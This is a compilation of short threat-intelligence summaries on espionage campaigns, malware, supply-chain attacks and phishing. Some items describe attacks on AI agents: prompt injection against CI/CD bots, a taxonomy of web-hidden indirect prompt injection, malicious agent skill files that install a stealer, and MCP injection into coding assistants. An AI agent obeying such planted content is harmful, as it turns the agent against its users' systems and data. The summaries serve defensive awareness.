Check Point Research has identified a Chinese-nexus advanced persistent threat group named Silver Dragon, targeting organizations in Southeast Asia and Europe since mid-2024. The group, likely operating under APT41, exploits public-facing servers and uses phishing emails for initial access. They deploy custom tools including GearDoor, a backdoor using Google Drive for command and control, SSHcmd for remote access, and SilverScreen for covert screen monitoring. Silver Dragon primarily focuses on government entities, utilizing Cobalt Strike beacons and DNS tunneling for communication. The group's sophisticated tactics and evolving toolkit demonstrate a well-resourced and adaptable threat actor.

A week-long automated attack campaign targeted CI/CD pipelines across major open source repositories, achieving remote code execution in multiple targets. The attacker, an autonomous bot called hackerbot-claw, used five different exploitation techniques and successfully exfiltrated a GitHub token with write permissions from one of the most popular repositories on GitHub. The campaign targeted repositories belonging to Microsoft, DataDog, CNCF, and other popular open source projects. The attacks included token theft via poisoned Go scripts, direct script injection, branch name injection, filename injection, and AI prompt injection. The most severe attack resulted in a full repository compromise of Aqua Security's Trivy project. The campaign highlights the growing threat of AI-powered bots targeting software supply chains and the need for automated security controls in CI/CD pipelines.

A sophisticated iOS exploit kit named Coruna has been discovered, targeting iPhones running iOS 13.0 to 17.2.1. The kit contains five full iOS exploit chains and 23 exploits, using advanced techniques and mitigation bypasses. Initially used by a surveillance vendor, it was later employed in targeted attacks against Ukrainian users and broad-scale campaigns by a Chinese financially motivated group. The kit's proliferation suggests an active market for second-hand zero-day exploits. The exploits are well-engineered and documented, with the most advanced using non-public techniques. The ending payload, PLASMAGRID, focuses on stealing financial information and cryptocurrency wallet data.

This article analyzes real-world instances of indirect prompt injection (IDPI) attacks targeting AI agents and large language models integrated into web systems. The researchers identify 22 distinct techniques used by attackers to embed malicious prompts in webpages, including visual concealment, obfuscation, and dynamic execution methods. They categorize attacker intents ranging from low-severity disruptions to critical data destruction attempts. Notable findings include the first observed case of AI-based ad review evasion and attempts at search engine optimization manipulation. The article presents a taxonomy of web-based IDPI attacks and provides insights into attack trends based on telemetry data. The researchers emphasize the need for proactive, web-scale defenses to detect IDPI and distinguish between benign and malicious prompts.

A malicious SMS spoofing campaign is spreading a fake version of Israel's 'Red Alert' emergency app amid ongoing conflict. The trojanized Android app, disguised as a trusted warning platform, can steal SMS, contacts, and location data while appearing legitimate. The campaign exploits public fear during crises to deploy mobile spyware. The malware uses sophisticated techniques to bypass security checks, including package manager hooking and dynamic payload loading. It mirrors the official app's interface but requests high-risk permissions. The malware continuously tracks GPS coordinates and exfiltrates data to attacker-controlled infrastructure, posing severe strategic and physical security risks. This campaign erodes trust in emergency response systems and could potentially be used for targeted attacks or to optimize missile targeting.

An extensive cyber espionage campaign conducted by SloppyLemming, an India-nexus threat actor, targeted government entities and critical infrastructure in Pakistan and Bangladesh from January 2025 to January 2026. The campaign used two attack vectors: PDF lures with ClickOnce execution chains and macro-enabled Excel documents. It deployed a custom x64 shellcode implant named BurrowShell and a Rust-based keylogger. The attackers extensively abused Cloudflare Workers for C2 and payload delivery, registering 112 domains impersonating government entities. The campaign focused on nuclear, defense, telecommunications, energy, and financial sectors, aligning with regional strategic competition in South Asia.

A significant joint offensive by the US and Israel has triggered a multi-vector retaliatory campaign from Iran, leading to an escalation in cyberattacks. Iran's limited internet connectivity is likely hindering state-aligned threat actors' ability to coordinate sophisticated attacks. Hacktivist groups are targeting perceived adversaries, while other nation-state actors may exploit the situation. Observed activities include phishing campaigns, DDoS attacks, data exfiltration, and wiper attacks. Multiple Iranian state-aligned personas and collectives have claimed responsibility for various disruptive operations. Pro-Russian hacktivist groups have also been active, targeting Israeli systems and infrastructure. The situation remains fluid, and organizations are advised to implement multi-layered defenses and focus on foundational security hygiene.

Microsoft has discovered phishing campaigns exploiting OAuth's redirection mechanisms to bypass conventional defenses. Attackers create malicious applications with redirect URIs pointing to malicious domains, then distribute phishing links prompting targets to authenticate. The attack abuses OAuth's error handling to redirect users from trusted providers to attacker-controlled sites for phishing or malware delivery. Campaigns targeted government and public sectors using e-signature, financial, and political lures. Some attacks led to malware downloads and endpoint compromise via PowerShell and DLL side-loading. Mitigation involves governing OAuth apps, limiting user consent, reviewing permissions, and implementing cross-domain detection across email, identity, and endpoint.

A suspected Iran-nexus threat actor, dubbed Dust Specter, targeted Iraqi government officials in January 2026. The campaign involved impersonating Iraq's Ministry of Foreign Affairs and using compromised government infrastructure to host malicious payloads. Two attack chains were identified, utilizing previously undocumented malware including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The malware employed creative evasion techniques, leveraged generative AI for development, and used file-based polling mechanisms for command execution. The campaign also incorporated ClickFix-style attacks and social engineering lures. Attribution to an Iran-nexus group is based on code similarities, victimology, and overlapping tactics with known Iranian APT groups.

The report details the resurgence of the Funnull cybercriminal group, now utilizing a new arsenal called RingH23. It exposes their tactics, including compromising GoEdge CDN nodes, poisoning the MacCMS supply chain, and deploying sophisticated malware components like Badredis2s, Badnginx2s, and Badhide2s. The group has expanded its operations to inject malicious JavaScript, hijack cryptocurrency transactions, and redirect traffic to fraudulent sites. The campaign's impact is estimated to affect millions of users daily. The report also highlights Funnull's use of a suspicious new CDN infrastructure, CDN1.AI, likely created to evade detection.

A new malicious campaign involving seventeen npm packages has been identified, utilizing Pastebin and text steganography as a dead-drop resolver. The attackers employ a complex decoding mechanism to extract C2 URLs from seemingly benign text on Pastebin. The malware targets multiple platforms, including Windows, macOS, and Linux, downloading and executing platform-specific payloads. The infection chain involves multiple fallback domains hosted on Vercel, demonstrating a sophisticated approach to maintain persistence. This novel technique, along with other recent developments, indicates an accelerated pace of testing and development by the threat actor, suggesting continued iterations in their infection methodologies.

A sophisticated scam campaign is targeting users with a fake Zoom meeting website that automatically downloads and installs an unauthorized version of Teramind, a legitimate workforce monitoring solution. The attackers create a convincing imitation of a Zoom video call, complete with fake participants and audio, to lure victims. After a short delay, an 'Update Available' prompt appears, leading to the silent installation of the monitoring software. The altered Teramind installer is configured to run stealthily and avoid detection by security tools. This campaign is particularly dangerous as it misuses legitimate commercial software, making it difficult for traditional antivirus tools to detect. The attackers gain full surveillance capabilities over the victim's device, including keylogging, screen capture, and file monitoring.

A recent PlugX campaign utilized phishing emails with a 'Meeting Invitation' lure to deploy malware through DLL side-loading. The infection chain begins with a zip file containing a malicious .csproj file and MSBuild executable. The .csproj file downloads three components: a legitimate G DATA Antivirus executable, a malicious Avk.dll (PlugX variant), and an encrypted AVKTray.dat file. The malware uses DLL side-loading, API hashing, and XOR encryption for obfuscation. It establishes persistence via the Run registry key and communicates with a command and control server. The campaign showcases PlugX's continued evolution while maintaining its core characteristics, highlighting its ongoing relevance in cyber-espionage operations.

This analysis details how threat actors are exploiting Windows File Explorer's WebDAV functionality to deliver malware. WebDAV, a legacy protocol, is being used to trick users into downloading malicious files without going through web browsers, potentially bypassing security controls. Campaigns often use complex chains of scripts and legitimate files to deliver Remote Access Trojans (RATs). The tactic has been observed since February 2024, with increased activity from September 2024. Threat actors frequently abuse Cloudflare Tunnel demo accounts to host WebDAV servers. The report explains WebDAV links, how File Explorer can be manipulated, and various methods used by attackers, including URL shortcut files and LNK files. It also highlights the prevalence of German and English language campaigns targeting European corporate email accounts.

A malicious campaign by threat actor UAT-10027 has been targeting education and healthcare sectors in the United States since December 2025. The campaign utilizes a new backdoor called Dohdoor, which employs DNS-over-HTTPS for stealthy command-and-control communications and can download and execute payloads reflectively. The multi-stage attack chain likely begins with phishing emails, followed by PowerShell scripts, batch files, and DLL sideloading techniques. Dohdoor uses various evasion methods, including API obfuscation, encrypted communications, and EDR bypasses. The campaign's infrastructure leverages Cloudflare services for stealth. While some techniques overlap with North Korean APT groups, the targeting differs from their typical focus.

This intelligence report details the evolution of malware delivery techniques targeting integrated development environments (IDEs) like Visual Studio Code and Cursor. The threat actors, known as Contagious Interview, have expanded their payload staging methods to include GitHub Gists, URL shorteners, Google Drive, and custom domains. New infection chains involve complex loaders, including a custom stack-based bytecode VM and PyArmor-protected Python malware. The report highlights the actors' adaptability in response to takedowns and community reporting, showcasing their use of various obfuscation techniques and masquerading tactics. Detection opportunities and indicators of compromise are provided, including suspicious process behaviors, file paths, and network requests.

A sophisticated phishing campaign impersonating Tesseract OCR was discovered, utilizing typosquatting and ClickFix techniques. The attack chain, named OCRFix, employed multi-stage malware deployments with heavy obfuscation and defense evasion techniques, including EtherHiding. The campaign used BNB Smart Chain TestNet to hide C2 domains through smart contracts. The malware delivery process involved three stages: a loader, a secondary loader for persistence, and a bot listener. The final payload connected to a bot control panel, allowing attackers to manage infected hosts and deploy additional malware. The campaign demonstrated a combination of simple initial access methods with complex delivery chains, highlighting the ongoing effectiveness of techniques like ClickFix and the importance of robust phishing defenses.

Threat actors have discovered a novel method to bypass security controls by abusing the .arpa top-level domain (TLD) in conjunction with IPv6 tunnels. They are exploiting a feature in DNS record management of certain providers to add IP address records for .arpa domains, allowing them to host phishing content on domains that should not resolve to an IP address. The phishing campaigns use spam emails impersonating major brands, with hyperlinked images leading to malicious websites through traffic distribution systems. This technique weaponizes trusted infrastructure essential for network operations, making it challenging for security tools to detect suspicious domains based on reputation, registration information, or policy blocklists.

A malicious npm package named "ambar-src" reached 50,000 downloads in days before being removed from the registry. It uses a preinstall script to execute malicious code during installation, targeting Windows, Linux, and macOS systems. The package employs detection evasion techniques and deploys powerful open-source malware variants. It abuses npm's preinstall script hook to trigger the payload without explicit invocation. The malware fetches additional payloads from remote servers and uses Yandex Cloud for command and control. Affected systems should be considered fully compromised, requiring immediate incident response actions. The attack highlights the speed at which supply chain risks can propagate and confirms that npm install is a high-risk action.

A malicious Go module impersonating the legitimate golang.org/x/crypto has been discovered, containing a backdoor in ssh/terminal/terminal.go. This module captures passwords, exfiltrates them, and executes remote commands. The attack chain includes a Linux stager that installs an SSH key for persistence, weakens firewall settings, and deploys a Rekoobe backdoor. The campaign targets high-trust cryptography libraries and likely aims at cloud environments. The threat actor uses GitHub for staging and disguises payloads as media files. This sophisticated supply chain attack highlights the need for careful scrutiny of Go module changes and implementation of robust security measures in development workflows.

This article draws parallels between Shakespeare's Henry IV and modern cybersecurity challenges, particularly focusing on the adoption of AI. It emphasizes the importance of taking calculated risks, learning from failures, and surrounding oneself with knowledgeable peers. The piece also highlights a new campaign by UAT-10027 using the 'Dohdoor' backdoor, which leverages DNS-over-HTTPS for stealthy communications and targets education and healthcare sectors in the US. The author encourages security teams to stay vigilant, update detection tools, and monitor for unusual activities to combat sophisticated threats.

APT37, a DPRK-backed threat group, has launched a new campaign called Ruby Jumper, utilizing Windows shortcut files to initiate attacks with newly discovered tools. These tools include RESTLEAF, SNAKEDROPPER, THUMBSBD, and VIRUSTASK, which work together to deliver surveillance payloads like FOOTWINE and BLUELIGHT. The campaign leverages removable media to infect and communicate with air-gapped systems. Key features include the use of Ruby for shellcode-based payloads, abuse of cloud storage services for command and control, and sophisticated techniques for bypassing network isolation. The malware demonstrates advanced capabilities in system reconnaissance, data exfiltration, and persistent surveillance.

A global espionage campaign targeting telecommunications and government organizations across four continents has been disrupted. The threat actor, UNC2814, is suspected to be linked to China and has been active since 2017. The campaign utilized a sophisticated backdoor called GRIDTIDE, which leveraged Google Sheets API for command and control. The attackers compromised 53 victims in 42 countries, with suspected infections in 20 more. GRIDTIDE's capabilities include executing shell commands, file transfers, and evading detection by disguising traffic as legitimate cloud API requests. The disruption involved terminating attacker-controlled cloud projects, disabling infrastructure, and revoking API access.

This analysis examines a sophisticated multi-stage infection chain utilizing Agent Tesla malware. The attack begins with a phishing email containing a RAR file, which includes an obfuscated JSE file. This initial stage triggers a series of script-based evasions, leading to the download and decryption of a PowerShell script. The malware then employs process hollowing to inject its payload into a legitimate Windows process, evading detection. Before exfiltrating data, the malware performs anti-analysis checks to avoid security software and virtual environments. Finally, Agent Tesla harvests sensitive information, including browser cookies and contacts, exfiltrating the data via SMTP to a command-and-control server.

This analysis examines CVE-2026-21513, a security bypass vulnerability in Microsoft's MSHTML framework, patched in February 2026. The flaw, actively exploited by Russian state-sponsored actor APT28, affects all Windows versions and has a CVSS score of 8.8. Using PatchDiff-AI, researchers identified the root cause in ieframe.dll's hyperlink navigation handling, allowing arbitrary file execution outside the browser's security context. The exploit involves a crafted Windows Shortcut file embedding HTML, communicating with APT28-linked infrastructure. It bypasses security measures like Mark of the Web and IE Enhanced Security Configuration through nested iframes and DOM manipulation, ultimately invoking ShellExecuteExW for out-of-sandbox execution.

In January 2026, a new variant of the PlugX malware was observed being used in targeted attacks. Analysis suggests involvement of the UNC6384 APT group, linked to Mustang Panda, targeting government agencies in Southeast Asia. The malware uses a browser updater disguise to download and execute a malicious MSI file, leading to PlugX infection. The STATICPLUGIN downloader uses a revoked code-signing certificate from a Chinese company. The PlugX variant employs DLL sideloading and shellcode execution techniques. Its configuration is encrypted using RC4 and custom encoding. C2 servers were identified as fruitbrat[.]com and 108.165.255[.]97:443. The ongoing improvements to PlugX indicate its continued use in targeted attacks by APT groups.

A European financial institution involved in regional development and reconstruction initiatives was targeted by a social engineering attack attributed to the Russia-aligned Mercenary Akula. The attack used a spoofed Ukrainian judicial domain to deliver an email containing a link to a remote access payload. The target was a senior legal and policy advisor involved in procurement. The attack employed a multi-stage extraction process and deployed the Remote Manipulator System, a legitimate remote administration tool. This incident suggests the adversary may be expanding beyond primarily Ukraine-based targeting, potentially probing Ukraine-supporting institutions in Western Europe. The attack aligns with Mercenary Akula's established tactics, including localized social engineering, multi-stage payload delivery, and the use of signed remote administration tools.

A coordinated campaign is targeting developers through malicious repositories disguised as legitimate Next.js projects and technical assessment materials. The attack uses multiple entry points that lead to runtime retrieval and local execution of attacker-controlled JavaScript, transitioning into staged command-and-control. The campaign employs three main execution paths: Visual Studio Code workspace automation, build-time execution during application development, and server startup execution via environment variable exfiltration and dynamic remote code execution. The attack chain includes a Stage 1 C2 beacon for registration and a Stage 2 C2 controller for persistent tasking. This sophisticated approach allows attackers to blend into routine developer workflows, increasing the likelihood of code execution and potentially compromising high-value assets such as source code, environment secrets, and access to build or cloud resources.

A deceptive campaign is using a fake Zoom meeting website to covertly install Teramind, a commercial monitoring tool, on unsuspecting users' Windows machines. The operation begins with a convincing imitation of a Zoom video call, complete with scripted participants and artificial technical issues. An automatic 'Update Available' prompt then initiates the download of a malicious installer without user consent. The installed software is a covert build of Teramind, designed to run invisibly and avoid detection by security tools. This campaign is particularly dangerous due to its use of legitimate commercial software, which may evade traditional antivirus detection. The attackers exploit users' trust in Zoom and Microsoft to execute their plan, highlighting the importance of verifying meeting links and being cautious with unexpected software updates.

Nefilim ransomware emerged in March 2020, evolving from Nemty's code. It targets vulnerabilities in Citrix gateway devices and uses exposed Remote Desktop Protocol for initial access. The malware exfiltrates sensitive data before encryption and threatens to publish it if ransom isn't paid. Nefilim uses tools like PsExec, Mimikatz, and LaZagne for lateral movement and credential theft. It employs AES-128 encryption and drops a ransom note named 'NEFILIM-DECRYPT.txt'. The ransomware has attacked high-profile targets like Toll Group. Mitigation strategies include strong passwords, disabling RDP, regular backups, software updates, and monitoring for lateral movement and data exfiltration.

A new Go-based remote access trojan named Moonrise has been discovered, operating without early static detection and establishing active C2 communication before vendor alerts. The RAT supports credential theft, remote command execution, persistence, and user monitoring, enabling full remote control of infected endpoints. Its capabilities include stealing passwords, executing remote commands, uploading files, capturing screens, and accessing webcams and microphones. The malware's silent operation increases business exposure, extending dwell time and raising risks of data loss and operational disruption. The attack chain involves session registration, host environment visibility, direct system interaction, credential access, active user monitoring, and privilege manipulation. Early detection strategies involve monitoring for weak signals, rapid triage with behavior confirmation, and threat hunting to prevent repeat incidents.

North Korean state-backed attackers are utilizing Medusa ransomware in their ongoing extortion attacks against the U.S. healthcare sector. The Symantec and Carbon Black Threat Hunter Team discovered evidence of North Korean actors employing Medusa in an attack on a Middle Eastern target and an unsuccessful attempt on a U.S. healthcare organization. Medusa, launched in 2023, operates as a ransomware-as-a-service. The Lazarus sub-group Stonefly has been a key player in North Korean ransomware attacks, using proceeds to fund espionage activities. Despite indictments and rewards, the attacks continue unabated. The current campaign employs various tools, including Comebacker, Blindingcan, ChromeStealer, and RP_Proxy. While the attacks bear similarities to previous Stonefly operations, the exact sub-group responsible remains unclear.

A NuGet supply chain attack involving four malicious packages targeting ASP.NET web application developers has been discovered. The campaign deploys a multi-stage payload where NCryptYo acts as a dropper, establishing a local proxy, while companion packages exfiltrate ASP.NET Identity data and accept threat actor-controlled authorization rules, creating backdoors in victim applications. The packages, published between August 12-21, 2024, have accumulated over 4,500 downloads. The attack uses obfuscation, JIT compiler manipulation, and a two-stage architecture to evade detection. The campaign's objective is to compromise applications during development, gaining access to deployed production instances by controlling the authorization layer.

A threat actor exploited CVE-2023-46604 on an exposed Apache ActiveMQ server, gaining initial access and later returning after being evicted. The attacker used Metasploit for post-exploitation activities, including privilege escalation, credential access, and lateral movement. Upon regaining access, they swiftly deployed LockBit ransomware via RDP using previously extracted credentials. The ransomware binary matched LockBit signatures but was likely crafted using the leaked LockBit builder, as evidenced by modified ransom notes and communication methods. The intrusion spanned 19 days from initial access to ransomware deployment, with less than 90 minutes between re-engagement and encryption during the second phase.

A new campaign exploits OpenClaw skills to distribute the Atomic MacOS Stealer (AMOS). This evolution in supply chain attacks manipulates AI agentic workflows to install malware. The campaign spans multiple repositories with hundreds of malicious skills uploaded to ClawHub and SkillsMP. The infection chain begins with a seemingly harmless SKILL.md file that installs a prerequisite, leading to the download of a Mach-O universal binary. This AMOS variant steals extensive data, including credentials, browser data, cryptocurrency wallets, and various user documents. It lacks system persistence but expands its reach by exfiltrating Apple and KeePass keychains. The malware uses sophisticated encryption schemes and targets multiple browsers and cryptocurrency wallets.

A sophisticated campaign by the Silver Fox APT group has been discovered using a fake version of the popular Chinese antivirus Huorong Security to distribute ValleyRAT, a Remote Access Trojan. The attackers created a convincing lookalike website with a typosquatted domain to trick users into downloading a malicious installer. The malware uses DLL sideloading techniques to deploy a full-featured backdoor with advanced stealth capabilities. It establishes persistence through scheduled tasks, disables Windows Defender, and employs various evasion tactics. Once installed, ValleyRAT provides attackers with extensive control over the victim's system, including keylogging, process injection, and credential theft. The campaign primarily targets Chinese-language systems but may be spreading to other threat actors due to the public leak of the ValleyRAT builder.

MuddyWater APT has launched Operation Olalampo, targeting organizations in the MENA region. The campaign involves new malware variants, including a Rust backdoor called CHAR, downloaders GhostFetch and HTTP_VIP, and an advanced backdoor GhostBackDoor. Notably, the group is using Telegram bots for command-and-control, revealing insights into their post-exploitation tactics. The operation, first observed on January 26, 2026, shows tactical and technical overlaps with previous MuddyWater activities. Key discoveries include potential AI-assisted malware development and infrastructure reuse dating back to October 2025. The campaign aligns with ongoing geopolitical tensions and provides valuable information on the threat actor's evolving techniques.

An active supply chain worm campaign, dubbed SANDWORM_MODE, is spreading through typosquatting and AI toolchain poisoning across at least 19 malicious npm packages. The worm exhibits Shai-Hulud characteristics, incorporating GitHub API exfiltration with DNS fallback, hook-based persistence, SSH propagation, and MCP server injection targeting AI coding assistants. It harvests credentials from developer and CI environments, exfiltrates data via multiple channels, and uses stolen identities to propagate. The campaign also includes a weaponized GitHub Action for CI secret harvesting. The worm employs a multi-stage design with obfuscated loaders, time-gated execution, and extensive configuration options. It targets high-traffic developer utilities, crypto tooling, and AI coding tools, posing a significant threat to the software supply chain.

The article analyzes a phishing campaign by the Cloud Atlas APT group targeting Russian organizations. It details five successful attacks on the same system over time, using malicious Microsoft Office documents to deliver the VBShower backdoor. The attackers used alternate data streams to hide malicious code and maintained persistence through registry modifications. The analysis covers the evolution of the attack chain, including the use of VBCloud malware and various command and control servers. Despite prolonged access, no evidence of lateral movement was found. The report concludes that Cloud Atlas continues to be active, using consistent tactics and tools.

This report analyzes the recent activities of the MuddyWater APT group, which primarily targets organizations in the Middle East. The group employs sophisticated spear-phishing techniques, often impersonating legitimate entities and using malicious documents to gain initial access. Their attacks focus on long-term infiltration and intelligence gathering rather than immediate disruption. The report details several attack cases from 2019 to 2026, highlighting the group's evolving tactics, including the abuse of legitimate remote management tools and the use of Rust-based malware. The analysis emphasizes the importance of endpoint detection and response (EDR) solutions in identifying and mitigating these threats, as traditional perimeter-based security measures prove insufficient against such advanced persistent threats.

A series of targeted phishing campaigns in Taiwan have been observed disseminating Winos 4.0 (ValleyRat) malware and associated plugins. The attacks exploit local business processes using themes like tax audits and e-invoices. The campaigns employ various techniques including malicious LNK files, DLL sideloading, and Bring Your Own Vulnerable Driver (BYOVD) attacks. The malware utilizes UAC bypassing, driver loading, and process termination to evade detection and disable security software. The attacks are attributed to a subgroup of the Silver Fox APT, showing sophisticated localization and evolving evasion techniques. The campaigns have been active since at least January 2026, using consistent infrastructure and development identifiers.

A sophisticated ClickFix campaign has been uncovered, compromising legitimate websites to deliver a multi-stage malware chain. The attack culminates in MIMICRAT, a custom remote access trojan with advanced capabilities. The campaign uses compromised sites across industries and geographies for delivery, employing a five-stage PowerShell chain that bypasses security measures before deploying a Lua-scripted shellcode loader. MIMICRAT, the final payload, is a native C++ RAT featuring malleable C2 profiles, Windows token theft, and SOCKS5 proxy functionality. The attack chain involves multiple compromised websites, obfuscated scripts, and sophisticated evasion techniques, demonstrating a high level of operational sophistication.

A critical remote code execution vulnerability (CVE-2026-1731) in BeyondTrust remote support software is being actively exploited. The flaw allows unauthenticated attackers to execute arbitrary OS commands with high privileges. Observed attacker activities include network reconnaissance, account creation, webshell deployment, C2 traffic, backdoor installation, lateral movement, and data theft. Affected sectors include finance, legal, technology, education, retail, and healthcare across multiple countries. Attackers are using tools like SparkRAT, VShell, and custom scripts for exploitation. The vulnerability is related to a similar one from 2024, highlighting the need for improved input validation and defense-in-depth strategies for remote access platforms.

ESET researchers have discovered PromptSpy, the first known Android malware to abuse generative AI in its execution flow. This malware uses Google's Gemini AI to analyze screen content and provide instructions for UI manipulation, allowing it to adapt to various devices and layouts. PromptSpy's main purpose is to deploy a VNC module for remote access to the victim's device. It also abuses the Accessibility Service to block uninstallation, captures lockscreen data, and records video. The campaign appears to target users in Argentina and was likely developed in a Chinese-speaking environment. PromptSpy demonstrates how incorporating AI tools can make malware more dynamic and capable of real-time decision-making, potentially expanding the pool of potential victims.

A critical zero-day vulnerability in Dell RecoverPoint for Virtual Machines has been discovered and actively exploited. The flaw, identified as CVE-2026-22769, allows attackers to gain root-level access on affected systems. China-linked threat actor UNC6201 has been leveraging this vulnerability in targeted intrusions since mid-2024, deploying custom backdoors like GRIMBOLT and BRICKSTORM for persistence and further compromise. The vulnerability affects versions prior to 6.0.3.1 HF1. Organizations are urged to apply the security patch immediately or use the provided remediation script if patching is not possible. Detection indicators for the malware and network traffic have been provided to help identify potential compromises.

The report outlines key cloud security threats for 2025, highlighting exploitation of misconfigurations, cloud abuse, ransomware, credential theft, and third-party risks. Threat actors are increasingly leveraging legitimate cloud services for malicious purposes, including using AI/ML capabilities. The report notes a shift towards cloud-native attack methods that abuse built-in functionality rather than traditional malware. Key trends include threat actors registering their own cloud resources, decreased effectiveness of DDoS attacks on cloud environments, and growing interest in targeting AI services. The analysis covers tactics used by various threat groups and provides detailed mitigation strategies for cloud defenders.

This intelligence report details a hybrid cryptocurrency investment scam campaign targeting users in Asia, particularly Japan. The scam combines malvertising techniques to attract victims with pig butchering tactics using AI-powered chatbots for sustained engagement. Victims are lured through social media ads impersonating financial experts, directed to lure websites, and then to messaging apps where automated bots manipulate them into making increasingly large investments. The campaign uses over 23,000 domains, many generated algorithmically, and shows signs of expanding globally. This approach represents a scalable, automated evolution of traditional investment fraud methods, potentially transforming labor-intensive scams into more efficient operations.

Savvy Seahorse, a DNS threat actor, employs sophisticated techniques to lure victims into fake investment platforms through Facebook ads. They use DNS CNAME records to create a traffic distribution system, enabling dynamic IP address updates and evasion of detection. The campaigns target multiple languages and involve fake ChatGPT and WhatsApp bots. Victims are convinced to create accounts, make deposits, and unknowingly transfer funds to Russian banks. The actor has been operating since August 2021, using dedicated hosting and frequently changing IP addresses. Their infrastructure includes approximately 4,200 base domains with CNAME records linked to subdomains of b36cname[.]site. The campaigns are short-lived, typically lasting 5-10 days per subdomain.

Infoblox security researchers have discovered a group of malicious domains hosting cryptocurrency scams, some linked to hacked YouTube channels. The domains, initially registered under CryptDesignBot, frequently change registrars to conceal information. They use lookalike domains to impersonate legitimate brands. Hacked YouTube channels are exploited to promote scam crypto domains through fake livestreams. The scams often claim to double cryptocurrency, mimicking old RuneScape scams. Many domains use keywords associated with celebrities and brands like Elon Musk and Tesla. Protective measures include implementing protective DNS, securing cookies, using HTTPS, generating random session IDs, and setting session timeouts. Infoblox's BloxOne Threat Defense offers protective DNS capabilities to combat sophisticated threats.

The report details a malware attack on a large Polish organization involving fake CAPTCHA techniques. It describes the initial infection vector, where users were tricked into running malicious code through a Windows+R shortcut. The analysis covers two main malware families: Latrodectus (version 2.3) and Supper. The report provides technical details on the malware's functionality, communication protocols, and persistence mechanisms. It also includes indicators of compromise, such as C2 server IP addresses and file hashes. The authors emphasize the importance of employee education and monitoring for unusual events to mitigate such threats.

A sophisticated malware campaign targeting macOS users has been discovered, utilizing typosquatted domains impersonating the Homebrew package manager. The attack, dubbed ClickFix, exploits users' trust in command-line installation processes. Victims are tricked into executing malicious curl commands, leading to the deployment of a credential harvester and the Cuckoo Stealer malware. This infostealer establishes persistence through LaunchAgents, bypasses Gatekeeper, and employs encrypted C2 communication. It systematically exfiltrates sensitive data including browser credentials, cryptocurrency wallets, and system information. The campaign's infrastructure spans multiple domains hosted on shared IP addresses, indicating a coordinated and evolving threat.

A malicious fork of the MacOS app Triton was discovered on GitHub, containing Windows-targeted malware disguised as the legitimate application. The attacker modified the repository, redirecting download links to a ZIP file hosting the malware. Analysis revealed sophisticated evasion techniques, anti-analysis features, and potential cryptocurrency functionality. The low detection rate and peculiar implementation suggest either an amateur attempt or a possible AI-generated attack. The incident highlights broader concerns about GitHub's security practices and Microsoft's priorities, prompting a call for developers to consider alternative code hosting platforms that better align with open-source values and user privacy.

A new phishing tactic involving fake Microsoft and Google Calendar invites has been identified, aimed at stealing login credentials. These sophisticated attacks mimic designs from well-known platforms, exploiting routine business activities like scheduling meetings. Threat actors use email spoofing and create fake urgent calendar invitations to deceive employees. The phishing emails often contain buttons or links that redirect to fake login pages, closely resembling official Microsoft or Google login screens. The campaigns exploit the popularity of calendar invitations in corporate environments, allowing attackers to gather sensitive information if users are not vigilant. To prevent falling victim to these attacks, it is crucial to verify the authenticity of calendar invites, carefully check sender details, and avoid clicking suspicious links from unknown senders.

Arkanix Stealer, a newly discovered malware operating under a Malware-as-a-Service model, targets a wide range of user data including cryptocurrencies, gaming, and online banking information. The stealer, available in both Python and C++ versions, offers configurable features and employs various techniques to evade detection. It can extract data from multiple browsers, VPNs, and gaming platforms, as well as capture screenshots and RDP connection details. The malware authors promoted their product through a Discord server and implemented a referral program to attract customers. The campaign appears to have been short-lived, with infrastructure taken down around December 2025.

A new malware-as-a-service (MaaS) called TrustConnect has been discovered masquerading as a legitimate remote monitoring and management (RMM) tool. The malware, classified as a remote access trojan (RAT), uses a fake business website as its command and control center and MaaS portal. Priced at $300 per month, it offers features like a web-based C2 dashboard, automated payload generation with digital signatures, and remote desktop capabilities. The malware has been distributed through various email campaigns, often alongside legitimate RMM tools. Proofpoint researchers identified links between TrustConnect's creator and previous users of Redline stealer. The emergence of this new MaaS demonstrates the ongoing evolution of the cybercrime market and the thriving ecosystem of RMM abuse.

This analysis reveals the growing threat of malicious OAuth applications in Microsoft Entra ID, which attackers use for persistence and privilege escalation. The report details how these apps blend in with legitimate integrations, making detection challenging. It describes the creation of OAuth Apps Scout, an automated detection pipeline that identifies emerging malicious OAuth apps. The research uncovered multiple campaigns, including one involving 19 apps impersonating well-known brands. The report compares tactics from 2019 to 2025, showing an evolution in attacker strategies from Microsoft impersonation to third-party SaaS spoofing. It concludes with actionable defense strategies for organizations to protect against these threats.

A new Android banking Trojan named Massiv has been discovered, posing a significant threat to mobile banking users. This malware allows remote control of infected devices and enables Device Takeover attacks, leading to fraudulent transactions from victims' accounts. Massiv is distributed through side-loading, often masquerading as IPTV applications. It features overlay functionality, keylogging, and SMS/Push message interception to steal sensitive data. The malware has targeted government applications and digital identity wallets, particularly in Portugal. Massiv supports screen streaming and UI-tree modes for remote control, bypassing screen capture protections. The trend of malware masquerading as IPTV apps is increasing, exploiting users' willingness to install from unofficial sources.

This analysis examines the evolution of Remcos, a Remote Access Trojan that has become a significant global threat. Originally a commercial tool, Remcos now provides attackers with capabilities such as credential theft, keylogging, screen capture, and webcam control. The latest variant exhibits real-time command-and-control communication, enabling immediate surveillance. The malware uses sophisticated techniques like dynamic API resolution, encrypted configurations, and modular plugins to evade detection. It establishes persistence through registry modifications and employs cleanup routines to remove traces of its activity. The report details Remcos' infection vectors, data exfiltration methods, and its network interactions with command-and-control servers.

A sophisticated cryptojacking campaign has been discovered, spreading through pirated software installers. The operation utilizes a customized XMRig miner and a controller component for long-term system access. Unlike browser-based schemes, this campaign deploys system-level malware using deceptive installers masquerading as office software. The modular design enhances resilience, with multiple watchdog processes for persistence. A notable feature is the exploitation of a vulnerable signed driver (CVE-2020-14979) to gain kernel-level access, boosting Monero mining performance by 15% to 50%. The campaign connects to the Kryptex mining pool and uses a Monero wallet for payouts. Organizations are advised to enable Microsoft's vulnerable driver blocklist and implement other protective measures.

GrayCharlie, a threat actor active since mid-2023, compromises WordPress sites to inject links redirecting visitors to NetSupport RAT payloads via fake browser updates or ClickFix mechanisms. These infections often lead to Stealc and SectopRAT deployments. The group's infrastructure is primarily linked to MivoCloud and HZ Hosting Ltd. A cluster of US law firm sites was compromised around November 2025, possibly through a supply-chain attack. GrayCharlie uses two main attack chains: one involving fake browser updates and another using ClickFix-style lures. The group's objectives appear to focus on data theft and financial gain, with potential access selling to other threat actors.

